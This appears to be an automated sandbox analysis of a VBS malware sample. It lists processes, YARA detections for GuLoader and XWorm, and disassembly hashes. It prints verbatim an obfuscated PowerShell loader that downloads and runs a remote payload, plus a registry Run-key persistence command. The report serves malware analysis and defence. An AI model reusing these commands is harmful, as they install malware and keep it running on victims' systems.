                                          2024-05-22 18:07:34 UTC8000INData Raw: c4 0a 81 62 3a 7f f0 0e 4a 6a 79 1e bb 11 4c fb e7 fa f0 59 ba 9a 36 06 35 3f 6e 84 f7 e0 f2 5e 80 18 d3 9e 40 3d b6 3c f5 88 09 2f f5 09 9e f2 88 7c 5f 40 a0 20 f0 36 4e 60 ff db c7 b8 31 f1 f1 d9 b5 2b 76 63 68 8a fb 28 69 14 3f 74 18 6b 7a c6 5a 56 00 1b f7 a2 5d de 53 b8 82 48 67 f7 8e 37 b0 40 83 bf 76 ff 13 ba 14 fd 79 a7 11 b4 1e 9d 17 02 b1 93 d1 03 c1 12 a2 c4 f3 6a 1a 9e bd 9a ff 93 f7 a7 8d 40 6d 3d 5c d2 5d 7f 64 0d d2 8f ff 6d a3 1f bb d0 51 e3 28 6c 1b 7c 53 f2 cc 58 c3 53 f0 63 2a a6 8f 19 8d 54 52 7d ba 6f c8 6b 43 5c 48 e3 27 27 82 8f 85 45 3f 2e e8 c7 60 b2 4a a0 28 19 9c 8a aa fa a0 42 9d 69 9e 03 74 8f 09 74 dc 72 81 4b 2f 40 4f 9c 36 4c 90 0c 07 62 42 4d 6c be 56 d7 bd 76 2f ec ee 74 77 19 40 ab c2 7a aa d0 7e 3b 2e 2d b1 78 6a 87 72
                                          Data Ascii: b:JjyLY65?n^@=</|_@ 6N`1+vch(i?tkzZV]SHg7@vyj@m=\]dmQ(l|SXSc*TR}okC\H''E?.`J(BittrK/@O6LbBMlVv/tw@z~;.-xjr
                                          2024-05-22 18:07:34 UTC3042INData Raw: 49 5e 04 fd 10 38 45 d7 58 81 86 d2 d2 5c 88 b8 fa 9b 5e f7 a9 3e 63 5c 99 71 64 42 cc fa f8 37 dc 44 b9 f7 45 0c 96 53 8a 6b 19 d9 1e 2a 08 d6 04 fb d4 c0 5d b8 7c 43 83 1b fc 02 76 2b 7d 0b 04 1b 62 e6 9f 38 b6 31 03 48 0f f7 17 2f b6 92 e0 5a 57 a9 83 31 fe 83 32 a7 d0 ab 04 61 df 38 b2 bc 12 35 d2 52 65 28 19 0c 5a 44 cc c1 4f b5 cf d8 2b f9 24 76 b9 d3 9d 25 f2 3d 39 be b7 17 c9 72 05 f4 f4 c6 82 70 7d 77 45 c6 7e 33 86 70 8f 26 47 8f a8 73 5b ba 21 65 ef 73 3f 81 fb b8 1d 7b d8 f8 41 57 4f c8 2f f2 18 0e 9a 7e d2 62 24 df 2a 59 c6 56 e8 ca 7e d9 94 70 e1 02 41 1b 2b 2a bc 7f 8d 4e 2a 09 93 b6 da f9 56 8f bf b7 db 58 93 34 10 64 d3 38 3e 6f 4d 12 61 04 14 c3 07 3a 6d 50 83 d0 13 a8 2f d4 e6 55 31 97 e6 5c db 5d c7 c1 05 91 7a a6 59 80 16 c4 6e d6 6c
                                          Data Ascii: I^8EX\^>c\qdB7DESk*]|Cv+}b81H/ZW12a85Re(ZDO+$v%=9rp}wE~3p&Gs[!es?{AWO/~b$*YV~pA+*N*VX4d8>oMa:mP/U1\]zYnl


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:14:06:50
                                          Start date:22/05/2024
                                          Path:C:\Windows\System32\wscript.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\temp.vbs"
                                          Imagebase:0x7ff747680000
                                          File size:170'496 bytes
                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:10
                                          Start time:14:06:57
                                          Start date:22/05/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt $Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5 L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/ Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma ';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter ',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd ,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl ');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter ' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSpe.keTubulr SknhsSkift[Os.eo$KonceLForbliMi.spf DieseKod.obLder.l ListoUnderoGare.dVou h]Pupil=Indyn$ CedeGRareteAnticn robeKod fr MaunaNonful Wonki.getisMediotPrincepsychrFors.nWebbeeoctansBgetr ');$Sedimentology=Quadmeter 'Forsg$CholoHFollouMo.incMichakCrudss bucctJevgeePs,udrUnde eSveskrP.ese.OyezeDProtaoCo bowDisfanHjernlFremfoBeskmaorgand BuslFsprayihelbrlVentreSkamf(Natur$enk sPOssifoSydkos Nonst FrihfJusterTakvioE,iksn RichtFolkeafilmil Un m,ele.t$SchweSMismoeKemikn.ftrasDiagniSub to TailnZa cl)Repro ';$Sension=$Mariane[0];Flaprer (Quadmeter 'F sty$cantlg ulteliv rao NonpbPr.reavandslE imi: .easI O,ygbBronzoSkee.eBleganMorfid BaadeHaptosHtte.=Hippo(taljeT arteFaldlsG bbetGl.sp-GgetsPVildta Gri,tStoddhoutpu udfol$ KodeS H,nseIngvenRundtsho.nwiAllowoB ogrnG,atb)Outsi ');while (!$Iboendes) {Flaprer (Quadmeter 'Diale$ ,notgSimull Bjero lagebS,iklaMacrolMiste:Fryt rtorpeeTalefw L llaEmbrokMycetiF.rlanKh ttgOuttr= Efte$,elgetarti,rSandiuCirc eFlabe ') ;Flaprer $Sedimentology;Flaprer (Quadmeter 'I.bjeSluthetBejaeaGleb,rHou et Gest- Nav SVinealAni.oeBriefeTroldpF.jia Rollo4Viru, ');Flaprer (Quadmeter 'Tryll$ infigTrafilTftinoAmpulb LudlaCheatlConso:BrndeI In ubThatconatioeConfin GalidFinene TerrsSkabs=Indle(SumplTPolite BeausClitutAnato- eakPHalluaFlammtS,linhUneli Pipet$ ConiSI dolePuppenSa,icscynomiFatt oPensinTande)Charl ') ;Flaprer (Quadmeter ' Nond$StilegSuccelUp taoKraftbImmeaaKontrlAf ci:Su,taNNul.teUnderw,krivsModstp MetaaKont,pTn,haeBegrbrAmalgw Sty,o uncomTrisoaTractnFiske=Sabao$ SivegProtalFrancoEsp,rbSuppeaKaliblYderv:Dok,eBopskrip,wdol PolslSonateFodredHdersgLseh.aKar,olSh,inlFileteBef lrKiliaiEn.ase He.srSu,penSt afe.esvr+ nfo+U,kke%Bordi$ MistS AfhatBogs,oHe taoBrnefn sams.Snipeclo,aloU deruartisnMonert Ste, ') ;$Postfrontal=$Stoon[$Newspaperwoman];}$Bortfaldets=331483;$Poultice=30104;Flaprer (Quadmeter 'Skra,$Jo,dfgSko,al,ovino P,ptbskaana heatlAll.n:UdbetTublufr.fspioBajadvfips,a UnretMinisoFiltrr SarieAntip Shri = skbn BietGTr gaeCo,sutVitam-TelocC S psoNephrn Dil.t FakueRaadynK oketBric Disso$ arinSAmazee ircn ,ndesKu,suiLatk,o f,ldnSnder ');Flaprer (Quadmeter 'De,ar$MetapgAlloclBethooInadvbHillbaTwic,lFilip:PrismHMedgaablegvzBitmaaI.idar.nebodGuttoiSvanesPeutieParoqspot.t Afnat=Pl ty Feti[,amilSNanosyAriids NonetSma.semucovmDisda. BeviCRetteo skr ncentrv unadeRenslrImplat Radi]Aarli:fdeva: AchrF.eogrrAt mioUdspemBygniBFusenaSigtesDybh.eStave6A,nes4AuspiS TjentOmvejrTernii Lin.nSkrubgeuryc(Kneb $KnaplTKra arS,xmio BestvParacaNumistIngefo nonirCent,eSisle) Homo ');Flaprer (Quadmeter 'Hoved$plukngE.ikelbrawnoAtlanb Ud.ia Trk.lLilia: ,oelSBi,alasim ldF,bridko.mue SkomlNetvrmstodgaBu lsgSchzjeFolkerG dssa KinnrGripybGag reSadisj DolldBesteeRkenlsStaff Foder=Airti super[StoltSSt.dgy CapesPostutHovedeAvogamDemag.Klun,TMononePaymax apentmaras. HedeEBrndsnNeurocVo,alo onomdEvighiFod onResolgWhitl]No.pr:batik:JechoAdetalSVirkeC Sub,IFrienISnadr. VigtG MesoeFili.tOtopaSFedtit.obberSalzfiRewaknG,nopgAlarm(L,ane$PopulHDrmmeaCentrzAfd laPhenor JuandEl rii Flaksbyta eMakkes .sdi)Numme ');Flaprer (Quadmeter 'hem.a$ModergApplalMozaroMisfibEg.nvaFertilOver :Vagtls undeoTet.acDi,ori Hyp aIn,uslb,irui UncosSymmevUr nem Hjlpr.naud= Unva$UnturSSpr.naBeskudYestod FebreFotoelOutram SelvaUnpasgHoldfeKantar BornaAdiporFusepbAnidreGanerjSkilldEjerteEntossUncov.WarslsTilveuKastabBurresStewatU,gagrOrcaniLicounEpexegHybe (Circu$SonniB SammoNonenr BohetProb.f Tilda .erolSammed L.reem.nudtTanglsOpkal,Untru$PamflPIdioto De xuUnharlSweeptHobbyiSteppcEf.ereS.ien)Siree ');Flaprer $socialisvmr;"
                                          Imagebase:0x7ff75da10000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.1884830141.0000024B64330000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:11
                                          Start time:14:06:57
                                          Start date:22/05/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff75da10000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:13
                                          Start time:14:06:59
                                          Start date:22/05/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Akenbold.udf && echo t"
                                          Imagebase:0x7ff6388e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:14
                                          Start time:14:07:05
                                          Start date:22/05/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt $Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5 L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/ Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma ';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter ',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd ,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl ');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter ' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSpe.keTubulr SknhsSkift[Os.eo$KonceLForbliMi.spf DieseKod.obLder.l ListoUnderoGare.dVou h]Pupil=Indyn$ CedeGRareteAnticn robeKod fr MaunaNonful Wonki.getisMediotPrincepsychrFors.nWebbeeoctansBgetr ');$Sedimentology=Quadmeter 'Forsg$CholoHFollouMo.incMichakCrudss bucctJevgeePs,udrUnde eSveskrP.ese.OyezeDProtaoCo bowDisfanHjernlFremfoBeskmaorgand BuslFsprayihelbrlVentreSkamf(Natur$enk sPOssifoSydkos Nonst FrihfJusterTakvioE,iksn RichtFolkeafilmil Un m,ele.t$SchweSMismoeKemikn.ftrasDiagniSub to TailnZa cl)Repro ';$Sension=$Mariane[0];Flaprer (Quadmeter 'F sty$cantlg ulteliv rao NonpbPr.reavandslE imi: .easI O,ygbBronzoSkee.eBleganMorfid BaadeHaptosHtte.=Hippo(taljeT arteFaldlsG bbetGl.sp-GgetsPVildta Gri,tStoddhoutpu udfol$ KodeS H,nseIngvenRundtsho.nwiAllowoB ogrnG,atb)Outsi ');while (!$Iboendes) {Flaprer (Quadmeter 'Diale$ ,notgSimull Bjero lagebS,iklaMacrolMiste:Fryt rtorpeeTalefw L llaEmbrokMycetiF.rlanKh ttgOuttr= Efte$,elgetarti,rSandiuCirc eFlabe ') ;Flaprer $Sedimentology;Flaprer (Quadmeter 'I.bjeSluthetBejaeaGleb,rHou et Gest- Nav SVinealAni.oeBriefeTroldpF.jia Rollo4Viru, ');Flaprer (Quadmeter 'Tryll$ infigTrafilTftinoAmpulb LudlaCheatlConso:BrndeI In ubThatconatioeConfin GalidFinene TerrsSkabs=Indle(SumplTPolite BeausClitutAnato- eakPHalluaFlammtS,linhUneli Pipet$ ConiSI dolePuppenSa,icscynomiFatt oPensinTande)Charl ') ;Flaprer (Quadmeter ' Nond$StilegSuccelUp taoKraftbImmeaaKontrlAf ci:Su,taNNul.teUnderw,krivsModstp MetaaKont,pTn,haeBegrbrAmalgw Sty,o uncomTrisoaTractnFiske=Sabao$ SivegProtalFrancoEsp,rbSuppeaKaliblYderv:Dok,eBopskrip,wdol PolslSonateFodredHdersgLseh.aKar,olSh,inlFileteBef lrKiliaiEn.ase He.srSu,penSt afe.esvr+ nfo+U,kke%Bordi$ MistS AfhatBogs,oHe taoBrnefn sams.Snipeclo,aloU deruartisnMonert Ste, ') ;$Postfrontal=$Stoon[$Newspaperwoman];}$Bortfaldets=331483;$Poultice=30104;Flaprer (Quadmeter 'Skra,$Jo,dfgSko,al,ovino P,ptbskaana heatlAll.n:UdbetTublufr.fspioBajadvfips,a UnretMinisoFiltrr SarieAntip Shri = skbn BietGTr gaeCo,sutVitam-TelocC S psoNephrn Dil.t FakueRaadynK oketBric Disso$ arinSAmazee ircn ,ndesKu,suiLatk,o f,ldnSnder ');Flaprer (Quadmeter 'De,ar$MetapgAlloclBethooInadvbHillbaTwic,lFilip:PrismHMedgaablegvzBitmaaI.idar.nebodGuttoiSvanesPeutieParoqspot.t Afnat=Pl ty Feti[,amilSNanosyAriids NonetSma.semucovmDisda. BeviCRetteo skr ncentrv unadeRenslrImplat Radi]Aarli:fdeva: AchrF.eogrrAt mioUdspemBygniBFusenaSigtesDybh.eStave6A,nes4AuspiS TjentOmvejrTernii Lin.nSkrubgeuryc(Kneb $KnaplTKra arS,xmio BestvParacaNumistIngefo nonirCent,eSisle) Homo ');Flaprer (Quadmeter 'Hoved$plukngE.ikelbrawnoAtlanb Ud.ia Trk.lLilia: ,oelSBi,alasim ldF,bridko.mue SkomlNetvrmstodgaBu lsgSchzjeFolkerG dssa KinnrGripybGag reSadisj DolldBesteeRkenlsStaff Foder=Airti super[StoltSSt.dgy CapesPostutHovedeAvogamDemag.Klun,TMononePaymax apentmaras. HedeEBrndsnNeurocVo,alo onomdEvighiFod onResolgWhitl]No.pr:batik:JechoAdetalSVirkeC Sub,IFrienISnadr. VigtG MesoeFili.tOtopaSFedtit.obberSalzfiRewaknG,nopgAlarm(L,ane$PopulHDrmmeaCentrzAfd laPhenor JuandEl rii Flaksbyta eMakkes .sdi)Numme ');Flaprer (Quadmeter 'hem.a$ModergApplalMozaroMisfibEg.nvaFertilOver :Vagtls undeoTet.acDi,ori Hyp aIn,uslb,irui UncosSymmevUr nem Hjlpr.naud= Unva$UnturSSpr.naBeskudYestod FebreFotoelOutram SelvaUnpasgHoldfeKantar BornaAdiporFusepbAnidreGanerjSkilldEjerteEntossUncov.WarslsTilveuKastabBurresStewatU,gagrOrcaniLicounEpexegHybe (Circu$SonniB SammoNonenr BohetProb.f Tilda .erolSammed L.reem.nudtTanglsOpkal,Untru$PamflPIdioto De xuUnharlSweeptHobbyiSteppcEf.ereS.ien)Siree ');Flaprer $socialisvmr;"
                                          Imagebase:0x780000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000E.00000002.1678157134.0000000008490000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000E.00000002.1669259847.00000000056D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000E.00000002.1678448244.000000000A310000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:15
                                          Start time:14:07:07
                                          Start date:22/05/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Akenbold.udf && echo t"
                                          Imagebase:0x410000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:19
                                          Start time:15:49:34
                                          Start date:22/05/2024
                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                          Imagebase:0x920000
                                          File size:516'608 bytes
                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000013.00000002.2566248537.0000000023A41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:moderate
                                          Has exited:false

                                          General

                                          Target ID:20
                                          Start time:15:49:38
                                          Start date:22/05/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)"
                                          Imagebase:0x410000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:21
                                          Start time:15:49:38
                                          Start date:22/05/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff75da10000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:22
                                          Start time:15:49:38
                                          Start date:22/05/2024
                                          Path:C:\Windows\SysWOW64\reg.exe
                                          Wow64 process (32bit):true
                                          Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)"
                                          Imagebase:0x110000
                                          File size:59'392 bytes
                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Executed Functions

                                            Function 00007FFAAC50AB26 Relevance: .5, Instructions: 474COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1926878601.00007FFAAC500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC500000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffaac500000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d1e2264ee849012ae8f100df28373c5e9867bd1e42045ed2c06e4898fa2106f1
                                            • Instruction ID: 81dccff22456105c54ae5173102b319318cc24d6664a1bbf35f749d0f3ddbbe1
                                            • Opcode Fuzzy Hash: d1e2264ee849012ae8f100df28373c5e9867bd1e42045ed2c06e4898fa2106f1
                                            • Instruction Fuzzy Hash: C2F1B571908A8E8FEBA8DF28C855BE937D1FF55310F04826EE84EC7291DB34D9458B81
                                            Function 00007FFAAC50B8D2 Relevance: .5, Instructions: 461COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1926878601.00007FFAAC500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC500000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffaac500000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 54a614e1741f58f325e96c05384869412689a54211c7f50f21fcafc514065118
                                            • Instruction ID: c2afdd8bfe47416d2cb8116ef0864a9262f50a8c748cec305701d096529ca2a2
                                            • Opcode Fuzzy Hash: 54a614e1741f58f325e96c05384869412689a54211c7f50f21fcafc514065118
                                            • Instruction Fuzzy Hash: 26E1B330908A4E8FEBA8DF28C896BE977E1FB55310F14826EE84DC7295CE74D84587C1
                                            Function 00007FFAAC5D4149 Relevance: .4, Instructions: 437COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1928152328.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffaac5d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dead1bf371af3737399888e8721e7cd3f9474f6f49aa43160b6a82cbe518c249
                                            • Instruction ID: 9ceee8734b5fd9433166233c46cfb7877f9c7dad4fdd716aacd15b5a22f31a59
                                            • Opcode Fuzzy Hash: dead1bf371af3737399888e8721e7cd3f9474f6f49aa43160b6a82cbe518c249
                                            • Instruction Fuzzy Hash: 08D1036194EB8B8FF796DB6888556B47BE5EF56210F1845BBE04EC3093DF1CD8488381
